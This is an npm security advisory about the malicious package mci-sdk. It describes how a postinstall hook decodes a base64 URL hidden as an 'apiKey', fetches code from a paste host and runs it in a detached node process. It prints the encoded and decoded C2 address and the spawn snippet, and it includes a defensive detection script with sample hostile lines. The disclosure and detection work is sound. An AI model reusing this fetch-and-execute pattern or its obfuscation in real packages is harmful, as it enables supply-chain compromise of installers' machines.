npm · Malicious package advisory
Malware: mci-sdk
MAL-2026-5931
Malicious code in mci-sdk (npm)
Details
---
## Source: amazon-inspector (1ae26c09350fdf9fb630e382c71dd730583ba1822122d232cde49a259597264f)
On `npm install`, mci-sdk runs the postinstall hook `node ./src/exec.js`, which imports `mci` from `src/core/index.js` and invokes it at module top level. The function reads a base64-encoded value stored as `MULTI_CHAIN_CONFIG.dev.apiKey` in `src/core/config.js` (`aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iLzJQNUZB`), decodes it to `https://jsonkeeper.com/b/2P5FA`, fetches the JSON via axios, and pipes `response.data.cookie` into `spawn('node', [], {detached:true, stdio:['pipe','ignore','ignore']})` followed by `child.unref()`. The fetched payload is therefore executed as Node.js code on the installer's machine, in a detached process that outlives the npm install.

The remote source is an anonymous paste host, with no pinning, hash, or signature verification; whoever controls the paste controls arbitrary code execution on every install. The C2 URL is deliberately disguised under a field labeled `apiKey` and base64-encoded to evade casual review and URL scanners. The same `mci`/`multiChainInterface` symbol is also re-exported from the package main (`src/index.js`), so any consumer that imports the package and reaches that code path triggers the same fetch-and-execute, not only installs that run the hook.

The package additionally clones the API surface and documentation of the legitimate `uhop/stream-chain` library (its README and llms.txt link to `github.com/uhop/stream-chain/wiki/...`) to attract developers seeking that package.
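The three indicators described above (a postinstall hook that runs node, a base64 string that decodes to a URL, and a detached `spawn('node', [])` fed through stdin) can be checked mechanically before a package is trusted. The following Node.js script is an added example written for this advisory, not code from the package or from Amazon Inspector; the package.json and source snippets it scans are constructed to mirror the description, and the function names are our own.

```javascript
// Added example: audit a package's files for the mci-sdk pattern.
// Candidate base64 runs: 20+ chars of the base64 alphabet, optional padding.
const BASE64_RUN = /[A-Za-z0-9+/]{20,}={0,2}/g;
const URL_PREFIX = /^https?:\/\/[\w.-]+/;

// Return every base64 token in `text` that decodes to an http(s) URL
// (the "apiKey" that is really a download location).
function findEncodedUrls(text) {
  const hits = [];
  for (const token of text.match(BASE64_RUN) || []) {
    const decoded = Buffer.from(token, 'base64').toString('utf8');
    if (URL_PREFIX.test(decoded)) hits.push({ token, url: decoded });
  }
  return hits;
}

// Flag spawn('node', []) with stdin piped and the child detached or unref'd:
// the shape that turns fetched text into code running past the install.
function findDetachedNodeSpawn(src) {
  const spawnsNode = /spawn\(\s*['"]node['"]/.test(src);
  const pipesStdin = /stdio\s*:\s*\[\s*['"]pipe['"]/.test(src);
  const detached = /detached\s*:\s*true/.test(src);
  const unref = /\.unref\(\)/.test(src);
  return spawnsNode && pipesStdin && (detached || unref);
}

// Audit a parsed package.json plus a map of file path -> source text.
function auditPackage(pkg, files) {
  const findings = [];
  const post = (pkg.scripts || {}).postinstall;
  if (post && /\bnode\b/.test(post)) findings.push(`postinstall runs node: ${post}`);
  for (const [path, src] of Object.entries(files)) {
    for (const hit of findEncodedUrls(src)) findings.push(`${path}: base64 hides URL ${hit.url}`);
    if (findDetachedNodeSpawn(src)) findings.push(`${path}: detached node spawn reads code from stdin`);
  }
  return findings;
}

// Constructed sample mirroring the advisory (not the package's actual files).
const samplePkg = { name: 'mci-sdk', scripts: { postinstall: 'node ./src/exec.js' } };
const sampleFiles = {
  'src/core/config.js':
    "module.exports = { MULTI_CHAIN_CONFIG: { dev: { apiKey: 'aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iLzJQNUZB' } } };",
  'src/core/index.js':
    "const child = spawn('node', [], { detached: true, stdio: ['pipe', 'ignore', 'ignore'] });\n" +
    "child.stdin.end(response.data.cookie); child.unref();",
};

const report = auditPackage(samplePkg, sampleFiles);
console.log(report.join('\n'));
```

Run it against an unpacked tarball (`npm pack` then extract) by replacing the constructed `sampleFiles` with the real file contents; three findings for one package is a strong signal, one in isolation is not.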
Compromised versions (2)
- 1.2.8
- 1.2.10
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.